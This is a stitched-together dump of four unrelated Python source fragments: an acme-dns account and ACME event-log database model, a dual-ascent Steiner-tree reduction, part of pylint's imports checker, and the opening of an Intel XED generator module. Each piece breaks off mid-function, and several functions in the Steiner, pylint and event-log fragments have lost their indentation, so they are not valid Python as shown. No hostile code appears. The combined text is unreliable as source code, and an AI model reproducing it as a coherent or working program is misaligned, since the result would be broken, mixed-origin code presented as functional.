class AcmeDnsServerAccount(Base, _Mixin_Timestamps_Pretty):
    """Credentials for a Domain's account on an acme-dns server."""

    __table_args__ = (
        # `is_active` participates so multiple inactive rows may coexist,
        # but only one active row per (server, domain) pair.
        sa.UniqueConstraint(
            "acme_dns_server_id",
            "domain_id",
            "is_active",
            name="domain_active_account",
        ),
    )
    __tablename__ = "acme_dns_server_account"
    id = sa.Column(sa.Integer, primary_key=True)
    timestamp_created = sa.Column(sa.DateTime, nullable=False)
    acme_dns_server_id = sa.Column(
        sa.Integer, sa.ForeignKey("acme_dns_server.id"), nullable=False
    )
    domain_id = sa.Column(sa.Integer, sa.ForeignKey("domain.id"), nullable=False)
    is_active = sa.Column(
        sa.Boolean, nullable=True, default=True
    )  # allow NULL for constraint to work
    username = sa.Column(sa.Unicode(255), nullable=False)
    password = sa.Column(sa.Unicode(255), nullable=False)
    fulldomain = sa.Column(sa.Unicode(255), nullable=False)
    subdomain = sa.Column(sa.Unicode(255), nullable=False)
    # JSON-encoded list of allowed source addresses; may be NULL.
    allowfrom = sa.Column(sa.Unicode(255), nullable=True)
    operations_event_id__created = sa.Column(
        sa.Integer, sa.ForeignKey("operations_event.id"), nullable=False
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    acme_dns_server = sa_orm_relationship(
        "AcmeDnsServer",
        primaryjoin="AcmeDnsServerAccount.acme_dns_server_id==AcmeDnsServer.id",
        uselist=False,
        back_populates="acme_dns_server_accounts",
    )
    domain = sa_orm_relationship(
        "Domain",
        primaryjoin="AcmeDnsServerAccount.domain_id==Domain.id",
        uselist=False,
        back_populates="acme_dns_server_accounts",
    )
    operations_event__created = sa_orm_relationship(
        "OperationsEvent",
        primaryjoin="AcmeDnsServerAccount.operations_event_id__created==OperationsEvent.id",
        uselist=False,
    )

    # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    @property
    def password_sample(self):
        """Redacted preview of the password, safe for display/logging."""
        return "%s...%s" % (self.password[:5], self.password[-5:])

    @property
    def as_json(self):
        """JSON-serializable summary of this account.

        Exposes only the redacted `password_sample`, never the raw secret.
        (The source had an anonymized `<PASSWORD>` placeholder here, which
        was a NameError; NOTE(review): confirm the redacted sample is the
        intended value for this public serialization.)
        """
        return {
            "AcmeDnsServer": self.acme_dns_server.as_json,
            "Domain": self.domain.as_json,
            "id": self.id,
            "timestamp_created": self.timestamp_created_isoformat,
            "username": self.username,
            "password": self.password_sample,
            "fulldomain": self.fulldomain,
            "subdomain": self.subdomain,
            # `allowfrom` is nullable; json.loads(None) would raise TypeError,
            # so guard like `pyacmedns_dict` does.
            "allowfrom": json.loads(self.allowfrom) if self.allowfrom else None,
        }

    @property
    def pyacmedns_dict(self):
        """
        :returns: a dict of items required for a pyacmedns client
        """
        return {
            "username": self.username,
            # the pyacmedns client needs the actual credential here (the
            # source had an anonymized `<PASSWORD>` placeholder, which was
            # a NameError)
            "password": self.password,
            "fulldomain": self.fulldomain,
            "subdomain": self.subdomain,
            "allowfrom": json.loads(self.allowfrom) if self.allowfrom else [],
        }
# ==============================================================================
class AcmeEventLog(Base, _Mixin_Timestamps_Pretty):
"""
log acme requests
"""
__tablename__ = "acme_event_log"
id = sa.Column(sa.Integer, primary_key=True)
timestamp_event = sa.Column(sa.DateTime, nullable=False)
acme_event_id = sa.Column(sa.Integer, nullable=False) # AcmeEvent
acme_account_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_account.id", use_alter=True), nullable=True
)
acme_authorization_id = sa.Column(
sa.Integer,
sa.ForeignKey("acme_authorization.id", use_alter=True),
nullable=True,
)
acme_challenge_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_challenge.id", use_alter=True), nullable=True
)
acme_order_id = sa.Column(
sa.Integer, sa.ForeignKey("acme_order.id", use_alter=True), nullable=True
)
certificate_request_id = sa.Column(
sa.Integer,
sa.ForeignKey("certificate_request.id", use_alter=True),
nullable=True,
)
certificate_signed_id = sa.Column(
sa.Integer,
sa.ForeignKey("certificate_signed.id", use_alter=True),
nullable=True,
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# acme_challenges = sa_orm_relationship(
# "AcmeChallenge",
# primaryjoin="AcmeEventLog.id==AcmeChallenge.acme_event_log_id",
# order_by="AcmeChallenge.id.asc()",
# back_populates="acme_event_log",
# )
# - - - - - - - | |
from sys import maxint
from heapq import heappop, heappush, heapify
from networkx import single_source_dijkstra_path_length, single_source_dijkstra_path, is_connected
from structures import steiner_graph as sg
import steiner_approximation as sa
from reduction import degree, long_edges, ntdk, sdc
from preselection import short_links, nearest_vertex
from reducer import Reducer
from collections import deque, defaultdict
import solver.heuristics.da_graph as dag
class DualAscent:
    """A reduction that uses dual ascent on the LP relaxation to estimate a lower bound"""

    # Roots that recently produced good bounds; class-level (shared) so later
    # runs can seed their root selection with them. Bounded to 10 entries.
    good_roots = deque(maxlen=10)
    def __init__(self, threshold=0.01, active_treshold=0.025, run_last=True):
        """Configure the reduction.

        @param threshold: fraction of edges that must be removed for the
            pass to count as successful (see `reduce`)
        @param active_treshold: activity threshold used to yield to other
            reducers on large graphs.
            NOTE(review): the keyword is misspelled ("treshold") but is part
            of the public signature; renaming it would break callers.
        @param run_last: whether this reduction should also run in the final
            round
        """
        self.runs = 0
        self._done = False
        self.enabled = True
        self._run_last = run_last
        self._threshold = threshold
        self._last_run = -1
        self.active_threshold = active_treshold
    def reduce(self, steiner, prev_cnt, curr_cnt):
        """Run one dual-ascent pass over the instance.

        Computes dual-ascent lower bounds from several roots, recombines and
        prunes the resulting solutions into upper bounds, then removes nodes
        and edges whose bounds exceed the best-known solution cost.

        @param steiner: the Steiner-graph instance being reduced
        @param prev_cnt: reduction count of the previous pass (unused here)
        @param curr_cnt: reductions other reducers achieved this pass
        @return: number of edges removed from the graph
        """
        # This invalidates the approximation. This is important in case the DA doesnt go through in the last run
        # so the solver has a valid approximation
        steiner.invalidate_approx(-2)
        # The pass counts as successful only if at least this many edges go.
        goal = len(steiner.graph.edges) * self._threshold
        # Too few terminals for dual ascent to pay off.
        if len(steiner.terminals) < 4:
            return 0
        # Let the others do their thing first
        if (len(steiner.graph.edges) > 2000 and curr_cnt > len(steiner.graph.edges) * self.active_threshold) \
                or not self.enabled:
            return 0
        self.runs += 1
        # parameters, adapt to instance size and density
        solution_limit = solution_rec_limit = prune_limit = prune_rec_limit = 0
        if len(steiner.graph.nodes) < 250 and len(steiner.graph.edges) / len(steiner.graph.nodes) < 5:
            solution_limit = 30
            solution_rec_limit = 10
            prune_limit = 10
            prune_rec_limit = 5
        # Small graph
        elif len(steiner.graph.nodes) < 500 and len(steiner.graph.edges) / len(steiner.graph.nodes) < 3:
            solution_limit = 15
            solution_rec_limit = 5
            prune_limit = 5
            prune_rec_limit = 3
        # Medium
        elif len(steiner.graph.nodes) < 3000 and len(steiner.graph.edges) / len(steiner.graph.nodes) < 3:
            solution_limit = 10
            solution_rec_limit = 5
            prune_limit = 3
            prune_rec_limit = 3
        # Dense graph
        elif len(steiner.graph.edges) / len(steiner.graph.nodes) > 3 or len(steiner.terminals) > 1000:
            solution_limit = 2
            solution_rec_limit = 1
            prune_limit = 1
            prune_rec_limit = 0
        # Large, not dense graphs
        elif len(steiner.graph.nodes) < 10000:
            solution_limit = 10
            solution_rec_limit = 0
            prune_limit = 1
            prune_rec_limit = 0
        else:
            solution_limit = 5
            solution_rec_limit = 0
            prune_limit = 1
            prune_rec_limit = 0
        # Init
        ts = list(steiner.terminals)
        track = len(steiner.graph.edges)  # edge count before this pass
        solution_limit = min(solution_limit, len(ts))
        target_roots = set()
        seed = self.runs
        # Distribute the root selection to not choose the same again and again:
        # reuse up to half the budget from previously good roots.
        while DualAscent.good_roots and len(target_roots) <= solution_limit / 2:
            el = DualAscent.good_roots.pop()
            if steiner.graph.has_node(el):
                target_roots.add(el)
                seed = el
        DualAscent.good_roots.clear()
        seed += self.runs
        # Fill the remaining budget pseudo-randomly (196613 is just a large
        # prime used to scatter indices over the terminal list).
        for idx in ((i * 196613 + seed) % len(ts) for i in range(1, len(ts) + 1)):
            if len(target_roots) == solution_limit:
                break
            el = ts[idx]
            seed = el
            target_roots.add(el)
        # NOTE(review): this line discards everything selected above and
        # replaces it with evenly spaced terminals, making the good_roots /
        # seed machinery dead code. Looks like a leftover experiment —
        # confirm which selection strategy is intended.
        # (Also relies on Python 2 integer division: `len(ts) / solution_limit`.)
        target_roots = [ts[max(len(ts) / solution_limit, 1) * i] for i in xrange(0, solution_limit)]
        results = []
        algs = [self.calc, self.calc3]
        # Generate solutions. Only algs[1] (calc3) is used; algs[0] is unused.
        for i in range(0, len(target_roots)):
            r = target_roots[i]
            results.append(algs[1](steiner.graph, r, steiner.terminals))
        # Sort by lower bound, best (largest) first.
        results.sort(key=lambda x: x[0], reverse=True)
        solution_pool = []
        # Tries to recombine solution graphs into a better solution
        if solution_rec_limit > 0:
            solution_rec_idx = list(self.index_generator(0, len(results), solution_rec_limit))
            solution_pool.extend(self.find_new(steiner, [results[i] for i in idx]) for idx in solution_rec_idx)
        # Tries to find better graphs by pruning the solutions
        if prune_limit > 0:
            solution_pool.extend(self.prune_ascent(steiner, results[i])
                                 for i in range(0, min(len(results), prune_limit)))
        # Tries to find better solutions by recombining the solutions found above
        if prune_rec_limit > 0:
            solution_pool.sort(key=lambda tr: tr.cost)
            pruned_idx = self.index_generator(0, min(10, len(solution_pool)), prune_rec_limit)
            solution_pool.extend(self.find_new_from_sol(steiner, [solution_pool[i] for i in idx]) for idx in pruned_idx)
        # Find best upper bound from all solutions
        ub = min(solution_pool, key=lambda tr: tr.cost)
        if ub.cost < steiner.get_approximation().cost:
            steiner._approximation = ub
        # Reduce graph with every computed (bound, residual graph, root).
        steiner.lower_bound = results[0][0]
        for c_bnd, c_g, c_root in results:
            self.reduce_graph(steiner, c_g, c_bnd, c_root)
        # Publish the best result for other components to consume.
        DualAscent.value, DualAscent.graph, DualAscent.root = results[0]
        # Inversed order, so best is the last element
        for i in reversed(range(0, len(results))):
            DualAscent.good_roots.append(results[i][2])
        track = track - len(steiner.graph.edges)
        if track > 0:
            # The graph changed: cached distances / steiner data are stale.
            steiner.invalidate_steiner(-2)
            steiner.invalidate_dist(-2)
            steiner.invalidate_approx(0)
        # Disable this reduction once it stops paying for itself.
        self.enabled = track > goal
        return track
    def reduce_graph(self, steiner, g, bnd, root):
        """Removes nodes that violate the upper bound using the dual ascent solution as a lower bound

        @param g: dual-ascent residual graph; `g._pred` is accessed directly,
            so a networkx-DiGraph-like object is assumed — TODO confirm
        @param bnd: lower bound achieved by dual ascent from `root`
        @param root: the root terminal the bound was computed from
        """
        # With so few terminals the instance is handled by other reductions.
        if len(steiner.terminals) <= 3:
            return
        pred = g._pred
        # Distance from the root to every node in the residual graph.
        root_dist = single_source_dijkstra_path_length(g, root)
        # Voronoi partition of the non-root terminals (helper defined
        # elsewhere on this class).
        vor = self.voronoi(g, [t for t in steiner.terminals if t != root])
        edges = set()
        # Anything whose bounded path cost exceeds this cannot be optimal.
        limit = steiner.get_approximation().cost - bnd
        for (t, v) in vor.items():
            for (n, d) in v.items():
                if steiner.graph.has_node(n):
                    # Theoretically the paths should be arc-disjoint -> possible tighter bound
                    if root_dist[n] + d > limit:
                        steiner.remove_node(n)
                    else:
                        for n2, dta in pred[n].items():
                            if steiner.graph.has_edge(n2, n) and root_dist[n2] + dta['weight'] + d > limit:
                                # Remove the undirected edge only after both
                                # arc directions have violated the bound.
                                if (n, n2) in edges:
                                    steiner.remove_edge(n, n2)
                                else:
                                    edges.add((n2, n))
def index_generator(self, start, end, count):
"""Produces count many numbers distributed between start and end"""
gap = end - start
c_count = 1
while c_count <= count:
target = max(2, min(gap, gap / c_count + 1))
yield [start + (i * 83 + c_count) % gap for i in range(0, target)]
c_count += 1
    def prune_ascent(self, steiner, result):
        """Turn a dual-ascent result into an upper bound.

        Approximates on the subgraph of zero-reduced-cost arcs, then runs up
        to three reduce/prune rounds, keeping the cheapest solution found.

        @param result: (bound, residual_graph, root) tuple from dual ascent
        @return: the best SteinerApproximation found
        """
        og = sg.SteinerGraph()
        bnd, g, r = result
        og.terminals = set(steiner.terminals)
        # Keep only arcs with zero reduced cost, restored to their original
        # weights from the source graph.
        for (u, v, d) in g.edges(data='weight'):
            if d == 0:
                og.add_edge(u, v, steiner.graph[u][v]['weight'])
        sol = sa.SteinerApproximation(og, limit=10)
        red = Reducer(self.reducers(), run_limit=5)
        for i in xrange(0, 3):
            red.reduce(og)
            # Target removing ~10% of the edges (Python 2 integer division).
            sol2 = self.prune(og, max(1, len(og.graph.edges)) / 10, sol.tree)
            # prune() returns None when it disconnected the graph: stop.
            if sol2 is None:
                break
            red.reset()
            # Map the pruned solution back onto the unreduced graph.
            sol2.tree, sol2.cost = red.unreduce(sol2.tree, sol2.cost)
            if sol2.cost < sol.cost:
                sol = sol2
            if len(og.terminals) < 3:
                break
        return sol
def calc_edge_weight(self, g, u, v, d, tw):
dist1 = g.get_restricted_closest(u)[0]
dist2 = g.get_restricted_closest(v)[0]
if dist1[0] != dist2[0]:
return d + dist1[1] + dist2[1] + tw
else:
d12 = g.get_restricted_closest(u)[1][1]
d22 = g.get_restricted_closest(v)[1][1]
if d12 < maxint and d22 < maxint:
return d + min(dist1[1] + d22, dist2[1] + d12) + tw
else:
return d + dist1[1] + dist2[1] + tw
    def prune(self, g, min_removal, tree):
        """Remove non-terminal nodes whose Voronoi-based bound exceeds a
        threshold chosen to eliminate at least `min_removal` edges, then
        re-approximate.

        @param g: the (reduced) SteinerGraph to prune in place
        @param min_removal: minimum number of edges the chosen bound should
            eliminate. NOTE(review): callers pass `len(edges) / 10`, an int
            under Python 2; this code is Python 2 only (`xrange`, `maxint`).
        @param tree: current best solution tree — its nodes are never removed
        @return: a fresh SteinerApproximation, or None if pruning
            disconnected the graph
        """
        if len(g.terminals) < 3:
            return sa.SteinerApproximation(g)
        radius = g.get_radius()
        # Additive lower-bound term from the |T|-2 smallest radii.
        t_weight = sum(radius[i][0] for i in xrange(0, len(g.terminals) - 2))
        # TODO: Make this more efficient
        # Choose bound s.t. we eliminate at least min_removal edges
        edge_weights = [self.calc_edge_weight(g, u, v, d, t_weight) for (u, v, d) in g.graph.edges(data='weight')]
        edge_weights.sort(reverse=True)
        bnd = edge_weights[min(len(edge_weights)-1, min_removal)]
        for n in list(g.graph.nodes):
            # While all terminals must be in the tree, the list of terminals may have changed during preprocessing
            if not tree.has_node(n) and n not in g.terminals:
                dists = g.get_restricted_closest(n)
                if dists[1][1] < maxint:
                    total = dists[0][1] + dists[1][1] + t_weight
                    if total > bnd:
                        g.remove_node(n)
        if not is_connected(g.graph):
            return None
        # The graph changed: flush cached data before re-approximating.
        g.invalidate_steiner(-2)
        g.invalidate_dist(-2)
        g.invalidate_approx(-2)
        result = sa.SteinerApproximation(g, limit=10)
        return result
    def find_new_from_sol(self, steiner, solutions):
        """Combines (unoptimal) steiner trees into a new solution

        Merges the edges of several solution trees into one graph, biases
        edge weights so edges shared by many solutions look cheap, runs an
        approximation on the biased graph, then removes the bias again.
        """
        red = Reducer(self.reducers(), run_limit=5)
        alpha = defaultdict(lambda: 0)  # edge -> number of solutions using it
        dg = sg.SteinerGraph()
        dg.terminals = set(steiner.terminals)
        for ct in solutions:
            for (u, v, d) in ct.tree.edges(data='weight'):
                u, v = min(u, v), max(u, v)  # normalize the undirected key
                dg.add_edge(u, v, d)
                alpha[(u, v)] += 1
        red.reduce(dg)
        max_occ = len(solutions)
        # Penalize rarely shared edges: the more solutions agree on an edge,
        # the smaller the added penalty.
        for ((u, v), d) in alpha.items():
            if d > 0 and dg.graph.has_edge(u, v):
                dg.graph[u][v]['weight'] += (1 + (max_occ - d)) * 100
        app = sa.SteinerApproximation(dg, False, limit=10)
        # Undo the penalties on the graph and on the resulting tree.
        for ((u, v), d) in alpha.items():
            if d > 0 and dg.graph.has_edge(u, v):
                modifier = (1 + (max_occ - d)) * 100
                dg.graph[u][v]['weight'] -= modifier
                if app.tree.has_edge(u, v):
                    app.tree[u][v]['weight'] -= modifier
        app.optimize()
        # Map the tree back through the reductions applied above.
        r_result = red.unreduce(app.tree, app.cost)
        app.tree = r_result[0]
        app.cost = r_result[1]
        return app
def find_new(self, steiner, results):
"""Combines solution graphs into a new solution"""
red = Reducer(self.reducers(), run_limit=5)
alpha = defaultdict(set)
dg = sg.SteinerGraph()
dg.terminals = {x for x in steiner.terminals}
for (bnd, g, r) in results:
# 0 length paths
pths = single_source_dijkstra_path(g, r, cutoff=1)
for t in (t for t in steiner.terminals if t != r):
for i in range(1, len(pths[t])):
u, v = pths[t][i-1], pths[t][i]
u, v = min(u, v), max(u, v)
alpha[(u, v)].add(r)
if not dg.graph.has_edge(u, v):
dg.add_edge(u, v, steiner.graph[u][v]['weight'])
red.reduce(dg)
max_occ = len(results)
alpha = {(u, v): len(d) for ((u, v), d) in alpha.items()}
for ((u, v), d) in alpha.items():
if d > 0 and dg.graph.has_edge(u, v):
dg.graph[u][v]['weight'] += (1 + (max_occ - d)) * 100
app = sa.SteinerApproximation(dg, False, limit=10)
for ((u, v), d) in alpha.items():
if d > 0 and dg.graph.has_edge(u, v):
modifier = (1 + (max_occ - d)) * 100
dg.graph[u][v]['weight'] -= modifier
| |
# Source repository: lockhart39/HueQualityAndIngestionApp (gh_stars: 1-10)
# Copyright (c) 2003-2012 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:<EMAIL>
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""imports checkers for Python code"""
from logilab.common.graph import get_cycles, DotBackend
from logilab.common.modutils import is_standard_module
from logilab.common.ureports import VerbatimText, Paragraph
from logilab import astng
from logilab.astng import are_exclusive
from pylint.interfaces import IASTNGChecker
from pylint.checkers import BaseChecker, EmptyReport
def get_first_import(node, context, name, base, level):
    """return the node where [base.]<name> is imported or None if not found
    """
    fullname = '%s.%s' % (base, name) if base else name
    for stmt in context.body:
        if stmt is node:
            continue
        # Skip statements in the same scope that come after `node`.
        if stmt.scope() is node.scope() and stmt.fromlineno > node.fromlineno:
            continue
        matched = False
        if isinstance(stmt, astng.Import):
            matched = any(fullname == iname[0] for iname in stmt.names)
        elif isinstance(stmt, astng.From):
            matched = level == stmt.level and any(
                fullname == '%s.%s' % (stmt.modname, iname[0])
                for iname in stmt.names)
        if matched:
            # Mutually exclusive branches (try/except, if/else) don't count
            # as a re-import.
            return None if are_exclusive(stmt, node) else stmt
    return None
# utilities to represent import dependencies as a tree and as a dot graph ####
def make_tree_defs(mod_files_list):
    """get a list of 2-uple (module, list_of_files_which_import_this_module),
    it will return a dictionary to represent this as a tree
    """
    tree_defs = {}
    for modname, importers in mod_files_list:
        # Walk/create one tree level per dotted component; `branch` ends up
        # as the [child_dict, file_list] pair of the deepest component.
        branch = (tree_defs, ())
        for part in modname.split('.'):
            branch = branch[0].setdefault(part, [{}, []])
        # Only the leaf level records which files import the module.
        branch[1] += importers
    return tree_defs
def repr_tree_defs(data, indent_str=None):
    """return a string which represents imports as a tree"""
    lines = []
    entries = sorted(data.items(), key=lambda item: item[0])
    last = len(entries) - 1
    for position, (mod, (sub, files)) in enumerate(entries):
        files_repr = '(%s)' % ','.join(files) if files else ''
        if indent_str is None:
            # Top level: no tree decoration on the module itself.
            lines.append('%s %s' % (mod, files_repr))
            child_indent = '  '
        else:
            lines.append(r'%s\-%s %s' % (indent_str, mod, files_repr))
            # Last sibling closes the branch; others keep the vertical bar.
            child_indent = '%s  ' % indent_str if position == last \
                else '%s| ' % indent_str
        if sub:
            lines.append(repr_tree_defs(sub, child_indent))
    return '\n'.join(lines)
def dependencies_graph(filename, dep_info):
    """write dependencies as a dot (graphviz) file

    :param filename: output path; its last 4 characters (the extension)
        are stripped to form the graph name
    :param dep_info: dict mapping module name -> modules that import it
    """
    done = {}
    printer = DotBackend(filename[:-4], rankdir="LR")
    printer.emit('URL="." node[shape="box"]')
    # .items() instead of the Python-2-only .iteritems(): identical behaviour
    # on Python 2, and keeps the function usable under Python 3.
    for modname, dependencies in sorted(dep_info.items()):
        done[modname] = 1
        printer.emit_node(modname)
        for importer in dependencies:
            if importer not in done:
                done[importer] = 1
                printer.emit_node(importer)
    # Second pass: emit one edge per (importer -> imported) pair.
    for depmodname, dependencies in sorted(dep_info.items()):
        for modname in dependencies:
            printer.emit_edge(modname, depmodname)
    printer.generate(filename)
def make_graph(filename, dep_info, sect, gtype):
    """generate a dependencies graph and add some information about it in the
    report's section
    """
    dependencies_graph(filename, dep_info)
    message = '%simports graph has been written to %s' % (gtype, filename)
    sect.append(Paragraph(message))
# the import checker itself ###################################################
# Message table for the imports checker:
#   message id -> (format string, symbolic name, help description)
MSGS = {
    'F0401': ('Unable to import %s',
              'import-error',
              'Used when pylint has been unable to import a module.'),
    'R0401': ('Cyclic import (%s)',
              'cyclic-import',
              'Used when a cyclic import between two or more modules is \
detected.'),

    'W0401': ('Wildcard import %s',
              'wildcard-import',
              'Used when `from module import *` is detected.'),
    'W0402': ('Uses of a deprecated module %r',
              'deprecated-module',
              'Used a module marked as deprecated is imported.'),
    'W0403': ('Relative import %r, should be %r',
              'relative-import',
              'Used when an import relative to the package directory is \
detected.'),
    'W0404': ('Reimport %r (imported line %s)',
              'reimported',
              'Used when a module is reimported multiple times.'),
    'W0406': ('Module import itself',
              'import-self',
              'Used when a module is importing itself.'),

    'W0410': ('__future__ import is not the first non docstring statement',
              'misplaced-future',
              'Python 2.5 and greater require __future__ import to be the \
first non docstring statement in the module.'),
    }
class ImportsChecker(BaseChecker):
    """checks for
    * external modules dependencies
    * relative / wildcard imports
    * cyclic imports
    * uses of deprecated modules
    """

    __implements__ = IASTNGChecker

    # checker identification
    name = 'imports'
    msgs = MSGS
    priority = -2

    # command-line / rcfile options: (name, optparse-style option dict)
    options = (('deprecated-modules',
                {'default' : ('regsub', 'string', 'TERMIOS',
                              'Bastion', 'rexec'),
                 'type' : 'csv',
                 'metavar' : '<modules>',
                 'help' : 'Deprecated modules which should not be used, \
separated by a comma'}
                ),
               ('import-graph',
                {'default' : '',
                 'type' : 'string',
                 'metavar' : '<file.dot>',
                 'help' : 'Create a graph of every (i.e. internal and \
external) dependencies in the given file (report RP0402 must not be disabled)'}
                ),
               ('ext-import-graph',
                {'default' : '',
                 'type' : 'string',
                 'metavar' : '<file.dot>',
                 'help' : 'Create a graph of external dependencies in the \
given file (report RP0402 must not be disabled)'}
                ),
               ('int-import-graph',
                {'default' : '',
                 'type' : 'string',
                 'metavar' : '<file.dot>',
                 'help' : 'Create a graph of internal dependencies in the \
given file (report RP0402 must not be disabled)'}
                ),
               )
    def __init__(self, linter=None):
        """Initialize checker state and register the two reports."""
        BaseChecker.__init__(self, linter)
        self.stats = None         # pylint's shared stats dict, set in open()
        self.import_graph = None  # module name -> set of imported modules
        self.__int_dep_info = self.__ext_dep_info = None  # report caches
        self.reports = (('RP0401', 'External dependencies',
                         self.report_external_dependencies),
                        ('RP0402', 'Modules dependencies graph',
                         self.report_dependencies_graph),
                        )
    def open(self):
        """called before visiting project (i.e set of modules):
        reset the dependency stats and the import graph
        """
        self.linter.add_stats(dependencies={})
        self.linter.add_stats(cycles=[])
        self.stats = self.linter.stats
        self.import_graph = {}
    def close(self):
        """called after visiting project (i.e set of modules):
        report every import cycle found in the accumulated import graph
        (the original docstring said "before", copy-pasted from open())
        """
        # don't try to compute cycles if the associated message is disabled
        if self.linter.is_message_enabled('R0401'):
            for cycle in get_cycles(self.import_graph):
                self.add_message('R0401', args=' -> '.join(cycle))
def visit_import(self, node):
"""triggered when an import statement is seen"""
modnode = node.root()
for name, _ in node.names:
importedmodnode = self.get_imported_module(modnode, node, name)
if importedmodnode is None:
continue
self._check_relative_import(modnode, node, importedmodnode, name)
self._add_imported_module(node, importedmodnode.name)
self._check_deprecated_module(node, name)
self._check_reimport(node, name)
    def visit_from(self, node):
        """triggered when a from statement is seen: handle the special
        __future__ case, then run the usual checks on every imported name
        """
        basename = node.modname
        if basename == '__future__':
            # check if this is the first non-docstring statement in the module
            prev = node.previous_sibling()
            if prev:
                # consecutive future statements are possible
                if not (isinstance(prev, astng.From)
                        and prev.modname == '__future__'):
                    self.add_message('W0410', node=node)
            return
        modnode = node.root()
        importedmodnode = self.get_imported_module(modnode, node, basename)
        if importedmodnode is None:
            # unresolvable import: F0401 was already emitted
            return
        self._check_relative_import(modnode, node, importedmodnode, basename)
        self._check_deprecated_module(node, basename)
        for name, _ in node.names:
            if name == '*':
                self.add_message('W0401', args=basename, node=node)
                continue
            self._add_imported_module(node, '%s.%s' % (importedmodnode.name, name))
            self._check_reimport(node, name, basename, node.level)
def get_imported_module(self, modnode, importnode, modname):
try:
return importnode.do_import_module(modname)
except astng.InferenceError, ex:
if str(ex) != modname:
args = '%r (%s)' % (modname, ex)
else:
args = repr(modname)
self.add_message("F0401", args=args, node=importnode)
    def _check_relative_import(self, modnode, importnode, importedmodnode,
                               importedasname):
        """check relative import. node is either an Import or From node, modname
        the imported module name.

        Emits W0403 when a module is reached through an implicit relative
        import (its real name differs from the name used to import it).
        """
        # skip all the work when the message is disabled
        if 'W0403' not in self.active_msgs:
            return
        if importedmodnode.file is None:
            return False  # built-in module
        if modnode is importedmodnode:
            return False  # module importing itself
        # explicit relative imports (level set) and absolute-import mode
        # cannot produce an implicit relative import
        if modnode.absolute_import_activated() or getattr(importnode, 'level', None):
            return False
        if importedmodnode.name != importedasname:
            # this must be a relative import...
            self.add_message('W0403', args=(importedasname, importedmodnode.name),
                             node=importnode)
    def _add_imported_module(self, node, importedmodname):
        """notify an imported module, used to analyze dependencies"""
        context_name = node.root().name
        if context_name == importedmodname:
            # module importing itself !
            self.add_message('W0406', node=node)
        elif not is_standard_module(importedmodname):
            # handle dependencies: record which module imports which
            importedmodnames = self.stats['dependencies'].setdefault(
                importedmodname, set())
            if not context_name in importedmodnames:
                importedmodnames.add(context_name)
            # is_standard_module with the package directory as search path
            # tells whether this is an *internal* (same-package) dependency
            if is_standard_module(importedmodname, (self.package_dir(),)):
                # update import graph
                mgraph = self.import_graph.setdefault(context_name, set())
                if not importedmodname in mgraph:
                    mgraph.add(importedmodname)
def _check_deprecated_module(self, node, mod_path):
"""check if the module is deprecated"""
for mod_name in self.config.deprecated_modules:
if mod_path == mod_name or mod_path.startswith(mod_name + '.'):
self.add_message('W0402', node=node, args=mod_path)
    def _check_reimport(self, node, name, basename=None, level=None):
        """check if the import is necessary (i.e. not already done)"""
        # skip all the work when the message is disabled
        if 'W0404' not in self.active_msgs:
            return
        frame = node.frame()
        root = node.root()
        # look in the enclosing frame, and in the module root if different
        contexts = [(frame, level)]
        if root is not frame:
            contexts.append((root, None))
        for context, level in contexts:
            first = get_first_import(node, context, name, basename, level)
            if first is not None:
                self.add_message('W0404', node=node,
                                 args=(name, first.fromlineno))
def report_external_dependencies(self, sect, _, dummy):
"""return a verbatim layout for displaying dependencies"""
dep_info = make_tree_defs(self._external_dependencies_info().iteritems())
if not dep_info:
raise EmptyReport()
tree_str = repr_tree_defs(dep_info)
sect.append(VerbatimText(tree_str))
def report_dependencies_graph(self, sect, _, dummy):
"""write dependencies as a dot (graphviz) file"""
dep_info = self.stats['dependencies']
if not dep_info or not (self.config.import_graph
or self.config.ext_import_graph
or self.config.int_import_graph):
| |
#BEGIN_LEGAL
#
#Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
import genutil
import ildutil
import codegen
import re
import opnds
def is_target_op(agi, op, target_op):
    """
    @param op: instruction_info_t.operands[i] - the binded operand by an NT row
    @param target_op: string - the name of the target operand
    @param agi: all_generator_info_t - the main generator's data structure
    (as usual)
    Return True if op's name is target_op, or if op is a macro whose
    expansion contains target_op.
    """
    # Direct match on the operand name.
    if op.name.upper() == target_op:
        return True
    # Macro case: the lowercase name keys the state-bits table and the
    # macro's expansion text must mention the target operand.
    macros = agi.common.state_bits
    key = op.name.lower()
    return key in macros and target_op in macros[key].dump_str()
def get_setting_nts(agi, opname):
    """Return the NTs that bind an operand named `opname`.

    @param agi: all_generator_info_t - the main generator's data structure
    @param opname: string - name of the operand
    @return: a set of strings which are the names of NTs that bind an
        operand with name opname (a set, not a list as the original
        docstring claimed)
    """
    # (the original bound `state_dict = agi.common.state_bits` here but
    # never used it; is_target_op performs that lookup itself)
    nt_set = set()
    for nt_name in list(agi.nonterminal_dict.keys()):
        gi = agi.generator_dict[nt_name]
        parser = gi.parser_output
        for rule in parser.instructions:
            for op in rule.operands:
                if is_target_op(agi, op, opname):
                    nt_set.add(nt_name)
    return nt_set
def get_nt_seq(ptrn_wrds, nt_list, implied_nt=None):
    """Collect the NT names from `nt_list` in the order they occur in a
    pattern.

    @param ptrn_wrds: [string] - tokens of an instruction's pattern string
        (result of split() on the pattern)
    @param nt_list: [string] - NT names to look for in the pattern
